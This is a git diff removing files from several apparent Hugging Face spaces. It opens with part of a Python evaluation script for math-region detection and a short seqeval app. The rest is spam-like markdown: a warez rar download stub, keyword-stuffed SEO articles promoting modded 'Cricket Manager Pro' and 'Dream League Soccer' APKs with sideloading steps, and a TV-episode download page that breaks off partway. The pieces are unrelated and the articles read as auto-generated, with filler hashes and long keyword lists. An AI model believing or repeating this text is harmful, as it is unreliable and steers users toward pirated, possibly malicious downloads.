pool.join() - - detected_math_char = 0 - detected_text_char = 0 - - for math, text in ans: - detected_math_char = detected_math_char + math - detected_text_char = detected_text_char + text - - print('detected math chars ', detected_math_char) - print('detected text chars ', detected_text_char) - print('total math chars ', total_math_char) - - recall = detected_math_char / total_math_char - precision = detected_math_char / (detected_math_char + detected_text_char) - - fscore = 2 * recall * precision / (recall + precision) - - print('Char Recall\t', recall) - print('Char Precision\t', precision) - print('Char F-Score\t', fscore) - - -def 
character_level_score(args): - - filename, det_math_bbs, char_bbs, gt_math_bbs = args - detected_math_char_count = 0 - text_char_count = 0 - - for char_info in char_bbs: - char_bb = [float(char_info[1]), float(char_info[2]), float(char_info[3]), float(char_info[4])] - - for current_math_bb in det_math_bbs: - - math_bb = [float(current_math_bb[1]),float(current_math_bb[2]), - float(current_math_bb[3]),float(current_math_bb[4])] - - if box_utils.check_inside(char_bb, math_bb): #TODO - - if char_info[6] == 'MATH_SYMBOL': - detected_math_char_count = detected_math_char_count + 1 - break - else: - text_char_count = text_char_count + 1 - - return detected_math_char_count, text_char_count - -def box_level_granular_eval(training_pdf_names, total_math_char, gt_math_dir, det_math_dir, - gt_math_bbs, det_math_bbs, char_bbs, test_gt_math_dir): - - _, _, detailed_detections = IOUevaluater.IOUeval(test_gt_math_dir, det_math_dir) - assign_chars_to_math_boxes(gt_math_bbs, char_bbs) - assign_chars_to_math_boxes(det_math_bbs, char_bbs) - - single_char_det = [0, 0] - multi_char_det = [0, 0] - - total_single_char_det = 0 - total_multi_char_det = 0 - - single_char_gt = 0 - multi_char_gt = 0 - - for filename in training_pdf_names: - current_det = detailed_detections[filename] - - for page in current_det[0]: - coarse = current_det[0][page] - fine = current_det[1][page] - - #DET for recall - for det in coarse: - if gt_math_bbs[filename][str(int(float(page)))][int(det[3:])-1][5] > 1: - multi_char_det[0] = multi_char_det[0] + 1 - else: - single_char_det[0] = single_char_det[0] + 1 - - for det in fine: - if gt_math_bbs[filename][str(int(float(page)))][int(det[3:])-1][5] > 1: - multi_char_det[1] = multi_char_det[1] + 1 - else: - single_char_det[1] = single_char_det[1] + 1 - - # DET for precision - for det in det_math_bbs[filename][str(int(float(page)))]: - if det[5] > 1: - total_multi_char_det = total_multi_char_det + 1 - else: - total_single_char_det = total_single_char_det + 1 - - #TODO - # for gt in gt_math_bbs[filename][str(int(float(page)))]: - # if gt[5] == 1: - # single_char_gt = single_char_gt + 1 - # else: - # multi_char_gt = multi_char_gt + 1 - - # GT - for page in gt_math_bbs[filename]: - for gt in gt_math_bbs[filename][str(int(float(page)))]: - if gt[5] > 1: - multi_char_gt = multi_char_gt + 1 - else: - single_char_gt = single_char_gt + 1 - - # single char scores - coarse - # precision - print("Number of single character regions correctly detected IOU50, IOU75 ", single_char_det) - print("Total number of single character regions detected ", total_single_char_det) - print("Total number of single character regions GT ", single_char_gt) - - print("Number of multi character regions correctly detected IOU50, IOU75 ", multi_char_det) - print("Total number of multi character regions detected ", total_multi_char_det) - print("Total number of multi character regions GT ", multi_char_gt) - - # Single character regions - - print("***** Results : Single Character Regions ***** ") - prec_50 = single_char_det[0]/total_single_char_det - rec_50 = single_char_det[0] / single_char_gt - fscore_50 = 2*prec_50*rec_50/(prec_50 + rec_50) - - print("Precision IOU50 ", prec_50) - print("Recall IOU50 ", rec_50) - print("F-score IOU50 ", fscore_50) - - prec_75 = single_char_det[1] / total_single_char_det - rec_75 = single_char_det[1] / single_char_gt - fscore_75 = 2 * prec_75 * rec_75 / (prec_75 + rec_75) - - print("Precision IOU75 ", prec_75) - print("Recall IOU75 ", rec_75) - print("F-score IOU75 ", fscore_75) - - print("***** 
Results : Multi Character Regions ***** ") - prec_50 = multi_char_det[0] / total_multi_char_det - rec_50 = multi_char_det[0] / multi_char_gt - fscore_50 = 2 * prec_50 * rec_50 / (prec_50 + rec_50) - - print("Precision IOU50 ", prec_50) - print("Recall IOU50 ", rec_50) - print("F-score IOU50 ", fscore_50) - - prec_75 = multi_char_det[1] / total_multi_char_det - rec_75 = multi_char_det[1] / multi_char_gt - fscore_75 = 2 * prec_75 * rec_75 / (prec_75 + rec_75) - - print("Precision IOU75 ", prec_75) - print("Recall IOU75 ", rec_75) - print("F-score IOU75 ", fscore_75) - -def find_merged_regions(training_pdf_names, gt_math_boxes, det_math_boxes): - - det_regions_with_multi_math = 0 - - for pdf_name in training_pdf_names: - for page in det_math_boxes[pdf_name]: - - for det in det_math_boxes[pdf_name][page]: - - count = 0 - - det_bb = [float(det[1]), float(det[2]), - float(det[3]), float(det[4])] - - if page not in gt_math_boxes[pdf_name]: - continue - - for gt in gt_math_boxes[pdf_name][page]: - - gt_bb = [float(gt[1]),float(gt[2]), - float(gt[3]),float(gt[4])] - - if box_utils.check_inside(gt_bb, det_bb): - count = count + 1 - - if count > 1: - det_regions_with_multi_math = \ - det_regions_with_multi_math + count - break - - print("Merged boxes ", det_regions_with_multi_math) - - -def assign_chars_to_math_boxes(all_math_boxes, all_char_bbs): - - for pdf_name in all_math_boxes: - for page in all_math_boxes[pdf_name]: - - #print('Assigning ', pdf_name, page) - math_boxes = all_math_boxes[pdf_name][page] - char_bbs = all_char_bbs[pdf_name][str(int(float(page)))] - - for math_box in math_boxes: - math_box.append(0) - - for char_info in char_bbs: - for math_bb in math_boxes: - - current_char_bb = [float(char_info[1]), float(char_info[2]), #TODO index from 1 - float(char_info[3]), float(char_info[4])] - - current_math_bb = [float(math_bb[1]),float(math_bb[2]), - float(math_bb[3]),float(math_bb[4])] - - if box_utils.check_inside(current_char_bb, current_math_bb): - math_bb[-1] = math_bb[-1] + 1 - - -if __name__ == '__main__': - - training_pdf_names = open(sys.argv[1], 'r') - - training_pdf_names_list = [] - - # for each training image pdf file - for pdf_name in training_pdf_names: - pdf_name = pdf_name.strip() - if pdf_name != '': - training_pdf_names_list.append(pdf_name) - training_pdf_names.close() - - detected_math_dir = sys.argv[2] #'/home/psm2208/code/eval/final_submission/Test/' - gt_math_dir = sys.argv[3] # '/home/psm2208/data/GTDB/annotations/' - - gt_char_dir = sys.argv[4]#'/home/psm2208/data/GTDB/char_annotations/' - test_gt_math_dir = sys.argv[5] #/home/psm2208/Workspace/Task3_Detection/Test/test_math/ - - image_dir = '/home/psm2208/data/GTDB/images/' - - training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs = \ - read_data(training_pdf_names_list, gt_char_dir, gt_math_dir, detected_math_dir) - - char_level_eval(training_pdf_names, total_math_char, copy.deepcopy(gt_math_bbs), - copy.deepcopy(det_math_bbs), copy.deepcopy(char_bbs)) - - box_level_granular_eval(training_pdf_names, total_math_char, gt_math_dir, - detected_math_dir, gt_math_bbs, - det_math_bbs, char_bbs,test_gt_math_dir) - - find_merged_regions(training_pdf_names, copy.deepcopy(gt_math_bbs), copy.deepcopy(det_math_bbs)) diff --git a/spaces/evaluate-metric/seqeval/app.py b/spaces/evaluate-metric/seqeval/app.py deleted file mode 100644 index 7c05d59ec96e2789c3850ce0d656b932564d34af..0000000000000000000000000000000000000000 --- a/spaces/evaluate-metric/seqeval/app.py +++ /dev/null @@ -1,11 +0,0 @@ -import sys - 
-import evaluate -from evaluate.utils import launch_gradio_widget - - -sys.path = [p for p in sys.path if p != "/home/user/app"] -module = evaluate.load("seqeval") -sys.path = ["/home/user/app"] + sys.path - -launch_gradio_widget(module) diff --git a/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md b/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md deleted file mode 100644 index 55d1d50b526090aacc3eae529c65b14adc8231c4..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md +++ /dev/null @@ -1,6 +0,0 @@ -

    ns virtual dj 6.0 full by new star.rar


    Download Zip ————— https://urlca.com/2uDckH



    -
    -Star.Soccer.2010.RIP-Unleashed.rar. 01 star wars episode iv a new hope anh (305.30 ... ns virtual dj 6 0 full by new star (210.81 MB) download 1fdad05405
    -
    -
    -

    diff --git a/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md b/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md deleted file mode 100644 index 0c624b46677b85116478ebbebaf3da094eeb8f80..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md +++ /dev/null @@ -1,106 +0,0 @@ -
    -

    Cricket Manager Pro 2023 APK: A Review

    -

    If you are a cricket fan and love to play cricket games on your Android device, you might have heard of Cricket Manager Pro 2023 APK. This is a new and exciting game that lets you build your own cricket club from scratch and compete with other cricket managers around the world. In this article, we will review this game and tell you everything you need to know about it.

    -

    Introduction

    -

    Cricket Manager Pro 2023 APK is a sports simulation game developed by Wicket Gaming, a company that specializes in creating realistic and immersive cricket games. The game was released in March 2023 and has already gained a lot of popularity among cricket fans. The game has over 500,000 downloads on Google Play Store and has received positive reviews from users and critics alike.

    -

    cricket manager pro 2023 apk


    Download Zip ✺✺✺ https://urllie.com/2uNHHk



    -

    The game allows you to create your own cricket club from scratch and control every aspect of your team. You can name your club, design your jersey and emblem, scout and sign players, train them, manage their tactics and formations, expand your stadium and facilities, and lead them to glory in various leagues and cups. You can also challenge other cricket managers from around the world in daily matches and climb up the global leaderboard.

    -

    The game features realistic graphics, animations, sounds, and physics that make you feel like you are watching a real cricket match. The game also has in-depth statistics and data that help you analyze your performance and improve your strategy. The game is constantly updated with new features, content, and events that keep you engaged and entertained.

    -

    How to Download and Install Cricket Manager Pro 2023 APK

    -

    If you want to play Cricket Manager Pro 2023 APK on your Android device, you will need to download and install the APK file from a reliable source. Here are the steps to do so:

    -
      -
    1. Go to [1](https://apkcombo.com/cricket-manager-pro-2023/com.wicketgaming.cricketmanager/) or [2](https://apkcombo.com/cricket-manager-pro-2023/com.wicketgaming.cricketmanager/download/apk) or [3](https://play.google.com/store/apps/details?id=com.wicketgaming.cricketmanager) and click on the download button to get the APK file.
    2. -
    3. Once the download is complete, locate the file on your device and tap on it to start the installation process.
    4. -
    5. You may need to enable unknown sources in your device settings to allow the installation of apps from outside the Google Play Store.
    6. -
    7. Follow the instructions on the screen to complete the installation.
    8. -
    9. Launch the game and enjoy!
    10. -
    -

    The game requires Android 4.4 or higher to run smoothly. It also requires access to your storage, network, location, phone, camera, microphone, contacts, calendar, and other permissions for various functions. You can review and manage these permissions in your device settings.
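If you download the APK to a computer first and prefer to push it to the phone from there, the same install step can be scripted. The sketch below is only an illustration, not an official procedure: it assumes the Android platform tools (adb) are installed, USB debugging is enabled on the device, and the downloaded file is named cricket_manager_pro_2023.apk (that file name is an assumption, not the real one).

```python
# Hypothetical sketch: sideloading the downloaded APK from a computer with adb.
# Assumes adb is on PATH and the phone is connected with USB debugging enabled.
import subprocess

APK_PATH = "cricket_manager_pro_2023.apk"  # placeholder name; adjust to your download

def sideload(apk_path: str) -> None:
    # List connected devices so you can confirm the phone is visible to adb.
    subprocess.run(["adb", "devices"], check=True)
    # Install the APK on the connected device (-r reinstalls/updates if already present).
    subprocess.run(["adb", "install", "-r", apk_path], check=True)

if __name__ == "__main__":
    sideload(APK_PATH)
```

This performs the same installation as tapping the downloaded file on the phone, just driven from a computer.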

    -

    How to Play Cricket Manager Pro 2023 APK

    -

    Playing Cricket Manager Pro 2023 APK is easy and fun. Here are some tips on how to play the game:

    -

    How to create your own cricket club from scratch?

    When you start the game, you will be asked to choose a country and a city for your club. You can also customize your club name, jersey color, and emblem. You will then be given a budget and a squad of players to start with. You can use the budget to buy new players or upgrade your facilities. You can also sell or release players to free up some funds.

    -

    cricket manager pro 2023 game download
    -cricket manager pro 2023 mod apk
    -cricket manager pro 2023 android
    -cricket manager pro 2023 latest version
    -cricket manager pro 2023 free download
    -cricket manager pro 2023 tips and tricks
    -cricket manager pro 2023 review
    -cricket manager pro 2023 cheats
    -cricket manager pro 2023 hack
    -cricket manager pro 2023 online
    -cricket manager pro 2023 pc
    -cricket manager pro 2023 ios
    -cricket manager pro 2023 update
    -cricket manager pro 2023 features
    -cricket manager pro 2023 gameplay
    -cricket manager pro 2023 best players
    -cricket manager pro 2023 strategy
    -cricket manager pro 2023 guide
    -cricket manager pro 2023 forum
    -cricket manager pro 2023 reddit
    -cricket manager pro 2023 wiki
    -cricket manager pro 2023 support
    -cricket manager pro 2023 facebook
    -cricket manager pro 2023 instagram
    -cricket manager pro 2023 youtube
    -cricket manager pro 2023 twitter
    -cricket manager pro 2023 wicket gaming
    -cricket manager pro 2023 cm23 apk
    -cricket manager pro 2023 apkcombo
    -cricket manager pro 2023 google play
    -cricket manager pro 2023 apk download
    -cricket manager pro 2023 apk mirror
    -cricket manager pro 2023 apk pure
    -cricket manager pro 2023 apk file
    -cricket manager pro 2023 apk modded
    -cricket manager pro 2023 apk cracked
    -cricket manager pro 2023 apk unlimited money
    -cricket manager pro 2023 apk obb data
    -cricket manager pro 2023 apk for android tv
    -cricket manager pro 2023 apk for tablet
    -cricket manager pro 2023 apk for pc windows
    -cricket manager pro 2023 apk for mac os x
    -cricket manager pro 2023 apk for linux ubuntu
    -cricket manager pro 2023 apk for chrome os
    -cricket manager pro 2023 apk for fire tv stick
    -cricket manager pro 2023 apk for nvidia shield tv
    -cricket manager pro 2023 apk for roku tv
    -cricket manager pro 2023 apk for samsung smart tv
    -cricket manager pro 2023 apk for lg smart tv

    -

    How to train your team and improve their skills?

    -

    Training is an essential part of the game, as it helps you improve your team's performance and morale. You can access the training menu from the main screen and choose from various drills and exercises for your players. You can also assign individual training plans for each player based on their strengths and weaknesses. Training consumes energy and time, so you need to balance it with rest and recovery.

    -

    How to manage transfers, squad selection and formations?

    -

    Transfers are another important aspect of the game, as they allow you to buy or sell players from other clubs. You can access the transfer market from the main screen and browse through the available players. You can also search for specific players by name, position, rating, or price. You can bid for players or accept offers from other clubs. You need to negotiate the transfer fee, salary, contract length, and bonuses with the player and his agent.

    -

    Squad selection and formation are crucial for your team's success on the pitch. You can access the squad menu from the main screen and choose your starting eleven and substitutes. You can also change your formation, tactics, and roles for each player. You need to consider your opponent's style, your team's chemistry, and your players' fitness and morale when making these decisions.

    -

    How to control your finances and expand your franchise?

    -

    Finances are another key factor in the game, as they affect your ability to buy new players, upgrade your facilities, and pay your staff. You can access the finance menu from the main screen and check your income and expenses. You can also see your balance sheet, cash flow, profit and loss statement, and financial projections. You need to manage your finances wisely and avoid overspending or going into debt.

    -

    Expanding your franchise is a way to increase your fan base, revenue, and reputation. You can access the franchise menu from the main screen and choose from various options to grow your club. You can upgrade your stadium capacity, build new facilities, hire new staff, launch new merchandise, sponsor events, or create media campaigns. Each option has a cost and a benefit that you need to weigh carefully.

    -

    How to compete with other cricket managers around the world?

    -

    Competing with other cricket managers is the most fun and challenging part of the game. You can access the competition menu from the main screen and choose from various leagues and cups to participate in. You can also see your current ranking, fixtures, results, stats, and awards. You need to win matches and trophies to climb up the leaderboard and earn rewards.

    -

    You can also challenge other cricket managers in daily matches that are randomly generated based on your level and region. You can chat with them, send them gifts, or taunt them before or after the match. You can also join or create a club with other managers and cooperate or compete with them in club events.

    -

    Pros and Cons of Cricket Manager Pro 2023 APK

    -

    Cricket Manager Pro 2023 APK is a great game for cricket fans who want to experience the thrill of managing their own cricket club. However, like any game, it has its pros and cons that you should be aware of before playing it. Here are some of them:

    - - - - - - - -
    ProsCons
    - Realistic graphics, animations, sounds, and physics- Requires a lot of storage space and data usage
    - In-depth statistics and data- May drain your battery quickly
    - Constant updates with new features, content, and events- May contain some bugs or glitches
    - Engaging gameplay with various options and challenges- May be addictive or time-consuming
    - Social interaction with other cricket managers- May involve some in-app purchases or ads
    -

    Conclusion

    -

Cricket Manager Pro 2023 APK is a game that lets you create your own cricket club from scratch and compete with other cricket managers around the world. It has realistic graphics, animations, sounds, and physics that make you feel like you are watching a real cricket match. It also has in-depth statistics and data that help you analyze your performance and improve your strategy. It also has constant updates with new features, content, and events that keep you engaged and entertained. It also has engaging gameplay with various options and challenges that test your skills and creativity. It also has social interaction with other cricket managers that adds to the fun and excitement.

However, the game also has some drawbacks that you should be aware of before playing it. It requires a lot of storage space and data usage, which may affect your device's performance and speed. It may also drain your battery quickly, which may limit your playing time. It may also contain some bugs or glitches that may affect your gameplay or cause errors. It may also be addictive or time-consuming, which may interfere with your other responsibilities or activities. It may also involve some in-app purchases or ads that may annoy you or tempt you to spend money.

Overall, Cricket Manager Pro 2023 APK is a game that we recommend for cricket fans who want to experience the thrill of managing their own cricket club. It has many pros that outweigh its cons, and it is a game that you will enjoy playing for a long time. However, you should also be mindful of the potential issues that may arise from playing it, and play it responsibly and moderately.

    FAQs

    -

    Here are some common questions and answers about the game:

    -

    Q: How can I get more coins and gems in the game?

    -

    A: Coins and gems are the main currencies in the game that you can use to buy new players, upgrade your facilities, or access premium features. You can earn coins and gems by winning matches, completing achievements, participating in events, or watching ads. You can also buy coins and gems with real money through in-app purchases.

    -

    Q: How can I change my club name, jersey color, or emblem?

    -

    A: You can change your club name, jersey color, or emblem by going to the club menu and tapping on the edit button. You can choose from various options or create your own custom design. However, you can only change these once every 30 days, so make sure you are happy with your choice before confirming it.

    -

    Q: How can I join or create a club with other managers?

    -

    A: You can join or create a club with other managers by going to the club menu and tapping on the club button. You can browse through the existing clubs or create your own club by choosing a name, logo, description, and settings. You can invite other managers to join your club or accept requests from others. You can also chat with your club members, send them gifts, or compete with them in club events.

    -

    Q: How can I contact the support team or report a problem?

    -

    A: You can contact the support team or report a problem by going to the settings menu and tapping on the help button. You can choose from various topics or categories that relate to your issue or question. You can also send an email to support@wicketgaming.com or visit their website at [4](https://www.wicketgaming.com/).

    -

    Q: How can I update the game or check for new features?

    -

    A: You can update the game or check for new features by going to the Google Play Store and searching for Cricket Manager Pro 2023 APK. You can see if there is a new version available and download it if there is. You can also enable automatic updates in your device settings to get the latest version automatically. You can also follow their social media accounts at [5](https://www.facebook.com/wicketgaming/) or [6](https://twitter.com/wicketgaming) to get updates and news about the game.

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md b/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md deleted file mode 100644 index 832ff14b6507e5048dd299e3ca6d803faa493c7a..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md +++ /dev/null @@ -1,131 +0,0 @@ - -

    Download Mod APK Dream League Soccer 2019 Indonesia

    -

    If you are a fan of soccer games and want to enjoy a realistic and immersive experience on your Android device, you might want to try Dream League Soccer 2019. This game is one of the most popular and highly rated soccer games on the Google Play Store, with over 100 million downloads and 4.5 stars. But what if you want to unlock more features, customize your team, and get unlimited resources in the game? That's where Mod APK comes in. In this article, we will tell you what is Dream League Soccer 2019, what is Mod APK, and how to download Mod APK Dream League Soccer 2019 Indonesia.

    -

    What is Dream League Soccer 2019?

    -

    Dream League Soccer 2019 is a sports game developed by First Touch Games Ltd. It is the latest version of the Dream League Soccer series, which started in 2016. In this game, you can create and manage your own dream team from over 3,500 FIFPro™ licensed players and compete in various leagues and tournaments. You can also design your own stadium, kits, and logos, and enjoy realistic graphics, animations, and gameplay at 60 frames per second.

    -

    download mod apk dream league soccer 2019 indonesia


    Download File ☆☆☆ https://urllie.com/2uNxEn



    -

    Features of Dream League Soccer 2019

    -

    Some of the features that make Dream League Soccer 2019 stand out from other soccer games are:

    -
      -
    • You can sign top superstar players such as Gareth Bale, Lionel Messi, Cristiano Ronaldo, and more to create your own dream team.
    • -
    • You can choose your formation, style, and tactics to suit your preferences and strategies.
    • -
    • You can rise through six divisions and seven cup competitions to reach the prestigious Elite Division and become the champion.
    • -
    • You can participate in regular live events to win prizes and glory.
    • -
    • You can enjoy exclusive soundtracks by Sunset Sons, The Luka State, Vistas, and more.
    • -
    -

    How to play Dream League Soccer 2019

    -

    To play Dream League Soccer 2019 on your Android device, you need to download it from the Google Play Store or from the official website. The game is free to download and play, but it contains in-app purchases that can enhance your gaming experience. You also need an internet connection to play online modes and access some features.

    -

    Once you have installed the game, you can start by creating your own team name, logo, and kit. You can also choose a captain from the available players. Then, you can enter the Dream League mode, where you can compete against other teams in different divisions. You can also play in the Cup mode, where you can face off against teams from different countries in knockout rounds. You can also join or create a club in the Online mode, where you can challenge other players from around the world.

    -

    To control your players on the field, you can use the virtual joystick on the left side of the screen to move them around. You can also use the buttons on the right side of the screen to pass, shoot, tackle, sprint, or switch players. You can also customize your controls in the settings menu.

    -

    What is Mod APK?

    -

Mod APK is a modified version of an original APK (Android Package Kit) file that has been altered by third-party developers or hackers to add or remove some features from the original app. Mod APKs are usually created for popular games or apps that have limitations or restrictions that prevent users from enjoying them fully.

    Benefits of Mod APK

    -

    Some of the benefits that Mod APK can offer to users are:

    -

    download mod apk dls 19 indonesia
    -download dream league soccer 2019 mod apk + obb
    -download dls 19 mod apk unlimited money
    -download dream league soccer 2019 mod apk latest version
    -download dls 19 mod apk timnas indonesia
    -download dream league soccer 2019 mod apk offline
    -download dls 19 mod apk all players unlocked
    -download dream league soccer 2019 mod apk android 1
    -download dls 19 mod apk unlimited coins and gems
    -download dream league soccer 2019 mod apk revdl
    -download dls 19 mod apk real madrid
    -download dream league soccer 2019 mod apk hack
    -download dls 19 mod apk barcelona
    -download dream league soccer 2019 mod apk rexdl
    -download dls 19 mod apk juventus
    -download dream league soccer 2019 mod apk data file host
    -download dls 19 mod apk liverpool
    -download dream league soccer 2019 mod apk mega
    -download dls 19 mod apk manchester united
    -download dream league soccer 2019 mod apk mediafıre
    -download dls 19 mod apk psg
    -download dream league soccer 2019 mod apk no root
    -download dls 19 mod apk chelsea
    -download dream league soccer 2019 mod apk unlimited everything
    -download dls 19 mod apk arsenal
    -download dream league soccer 2019 mod apk and data
    -download dls 19 mod apk bayern munich
    -download dream league soccer 2019 mod apk pure
    -download dls 19 mod apk inter milan
    -download dream league soccer 2019 mod apk for pc
    -download dls 19 mod apk atletico madrid
    -download dream league soccer 2019 mod apk free shopping
    -download dls 19 mod apk ac milan
    -download dream league soccer 2019 mod apk full unlocked
    -download dls 19 mod apk borussia dortmund
    -download dream league soccer 2019 mod apk vip unlocked
    -download dls 19 mod apk leicester city
    -download dream league soccer 2019 mod apk low mb
    -download dls 19 mod apk napoli
    -download dream league soccer 2019 mod apk new update
    -download dls 19 mod apk tottenham hotspur
-download dream league soccer 2019 mod apk original logo and kits offline hd graphics unlimited coins and money full transfers unlocked players online offline latest version android game free direct mediafire link no ads no survey no verification no password no human verification no root required install play enjoy have fun

    -
      -
    • You can access premium features or content that are otherwise locked or unavailable in the original app.
    • -
    • You can get unlimited resources such as coins, gems, money, or energy that can help you progress faster or buy more items in the game.
    • -
    • You can customize your game settings, graphics, interface, or gameplay according to your preferences.
    • -
    • You can bypass ads, verification, or registration processes that can be annoying or time-consuming.
    • -
    • You can enjoy new or exclusive features that are not present in the original app.
    • -
    -

    Risks of Mod APK

    -

    However, Mod APK also comes with some risks that users should be aware of before downloading or installing them. Some of the risks are:

    -
      -
    • You can violate the terms and conditions of the original app developer or publisher, which can result in legal actions or account bans.
    • -
    • You can expose your device to malware, viruses, spyware, or other harmful software that can damage your device or steal your personal information.
    • -
    • You can lose your progress, data, or files if the Mod APK is incompatible, unstable, or corrupted.
    • -
    • You can experience bugs, glitches, errors, or crashes that can affect your game performance or enjoyment.
    • -
    • You can miss out on updates, patches, or new features that are released by the original app developer or publisher.
    • -
    -

    How to download Mod APK Dream League Soccer 2019 Indonesia

    -

    If you want to download Mod APK Dream League Soccer 2019 Indonesia, you need to follow some steps and requirements. Here are some of them:

    -

    Requirements for downloading Mod APK Dream League Soccer 2019 Indonesia

    -

    Before you download Mod APK Dream League Soccer 2019 Indonesia, you need to make sure that you have the following requirements:

    -
      -
    • An Android device that runs on Android 4.4 or higher.
    • -
    • Enough storage space on your device or SD card to accommodate the Mod APK file and the OBB data file.
    • -
    • A reliable internet connection to download the files and play online modes.
    • -
    • A file manager app that can extract ZIP or RAR files and move them to the appropriate folders.
    • -
    • A backup of your original Dream League Soccer 2019 app and data in case something goes wrong.
    • -
    -

    Steps for downloading Mod APK Dream League Soccer 2019 Indonesia

    -

    After you have met the requirements, you can follow these steps to download Mod APK Dream League Soccer 2019 Indonesia:

    -
      -
    1. Go to a trusted website that provides Mod APK files for Dream League Soccer 2019. You can search on Google or use this link: [text].
    2. -
    3. Download the Mod APK file and the OBB data file from the website. The files should be in ZIP or RAR format and have a size of about 350 MB and 270 MB respectively.
    4. -
    5. Uninstall your original Dream League Soccer 2019 app from your device. You can do this by going to Settings > Apps > Dream League Soccer 2019 > Uninstall.
    6. -
    7. Enable the installation of apps from unknown sources on your device. You can do this by going to Settings > Security > Unknown Sources > Toggle On.
    8. -
    9. Extract the ZIP or RAR files using your file manager app. You should get an APK file and a folder named com.firsttouchgames.dls3.
    10. -
    11. Move the folder com.firsttouchgames.dls3 to Android > OBB on your device's internal storage or SD card.
    12. -
    13. Install the APK file by tapping on it and following the instructions on the screen.
    14. -
    15. Launch the game and enjoy Mod APK Dream League Soccer 2019 Indonesia.
    16. -
    -

    Tips for installing and using Mod APK Dream League Soccer 2019 Indonesia

    -

    To ensure a smooth and safe installation and usage of Mod APK Dream League Soccer 2019 Indonesia, here are some tips that you should follow:

    -
      -
    • Make sure that you download the files from a reputable and secure website. Avoid clicking on suspicious links or pop-ups that may contain malware or viruses.
    • -
    • Make sure that you have enough battery life on your device before installing or playing the game. You don't want your device to shut down in the middle of the process.
    • -
    • Make sure that you have a stable internet connection when playing online modes. You don't want to lose your connection or encounter lag or errors.
    • -
    • Make sure that you do not update the game from the Google Play Store or the official website. This may overwrite the Mod APK and cause it to stop working.
    • -
    • Make sure that you do not use the Mod APK to cheat or harm other players in online modes. This may result in account bans or legal actions.
    • -
    • Make sure that you have fun and enjoy the game with Mod APK Dream League Soccer 2019 Indonesia.
    • -
    -

    Conclusion

    -

    Dream League Soccer 2019 is a fantastic soccer game that lets you create and manage your own dream team and compete in various modes. However, if you want to enhance your gaming experience and unlock more features, you can try Mod APK Dream League Soccer 2019 Indonesia. This is a modified version of the original game that gives you unlimited resources, premium features, and customization options. However, you also need to be careful of the risks and challenges that come with using Mod APK. You need to follow the steps and tips that we have provided in this article to download, install, and use Mod APK Dream League Soccer 2019 Indonesia safely and smoothly. We hope that this article has helped you understand what is Mod APK, how to download it, and how to use it for Dream League Soccer 2019. If you have any questions or feedback, please feel free to leave a comment below.

    -

    FAQs

    -

    Here are some of the frequently asked questions about Mod APK Dream League Soccer 2019 Indonesia:

    -
      -
    1. What is the difference between Mod APK and OBB?
    2. -

      Mod APK is the modified version of the original app file that contains the code and logic of the game. OBB is the additional data file that contains the graphics, sounds, and other assets of the game. You need both files to run the game properly.

      -
    3. Can I use Mod APK on iOS devices?
    4. -

      No, Mod APK is only compatible with Android devices. iOS devices use a different file format and system for apps and games. You cannot install or run Mod APK on iOS devices.

      -
    5. Can I use Mod APK on PC or laptop?
    6. -

      Yes, you can use Mod APK on PC or laptop, but you need to use an Android emulator software that can simulate an Android device on your PC or laptop. Some of the popular Android emulators are BlueStacks, NoxPlayer, and LDPlayer. You need to download and install the emulator first, then follow the same steps as you would on an Android device.

      -
    7. Is Mod APK legal?
    8. -

      Mod APK is not legal in most cases, as it violates the intellectual property rights and terms and conditions of the original app developer or publisher. However, some Mod APKs are created with permission or collaboration from the original app developer or publisher, which makes them legal. You need to check the source and credibility of the Mod APK before downloading or using it.

      -
    9. Is Mod APK safe?
    10. -

      Mod APK is not safe in most cases, as it may contain malware, viruses, spyware, or other harmful software that can damage your device or steal your personal information. However, some Mod APKs are created by reputable and trustworthy developers or hackers, which makes them safe. You need to check the reviews and ratings of the Mod APK before downloading or using it.

      -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md b/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md deleted file mode 100644 index 0b526b6ad446d87a882a6d3dd6a3dd6462501ce0..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md +++ /dev/null @@ -1,176 +0,0 @@ -
    -

    Hawaii Five-0 Season 1 Episode 1: A Thrilling Start to a New Series

    -

    If you are looking for a new show to binge-watch, you might want to check out Hawaii Five-0, a modern remake of the classic police drama that ran from 1968 to 1980. The first episode of the rebooted series aired on September 20, 2010, and it was a hit with both critics and viewers. Here is everything you need to know about Hawaii Five-0 Season 1 Episode 1, from what it is about, to where you can watch it, to who are the stars behind it.

    -

    What is Hawaii Five-0?

    -

    Hawaii Five-0 is a police procedural drama that follows an elite task force that investigates crimes on the Hawaiian islands. The task force is led by Steve McGarrett (Alex O'Loughlin), a former Navy SEAL who returns to his home state after his father is murdered by a terrorist. He is joined by Danny Williams (Scott Caan), a New Jersey cop who moved to Hawaii to be closer to his daughter; Chin Ho Kelly (Daniel Dae Kim), a former Honolulu police detective who was wrongly accused of corruption; and Kono Kalakaua (Grace Park), a rookie officer and Chin's cousin. Together, they form the "Five-0", a nickname given by Governor Pat Jameson (Jean Smart), who gives them full immunity and means to fight crime.

    -

    hawaii five-0 season 1 episode 1 download


    Download Zip ✏ ✏ ✏ https://urllie.com/2uNBQV



    -

    What happens in the pilot episode?

    -

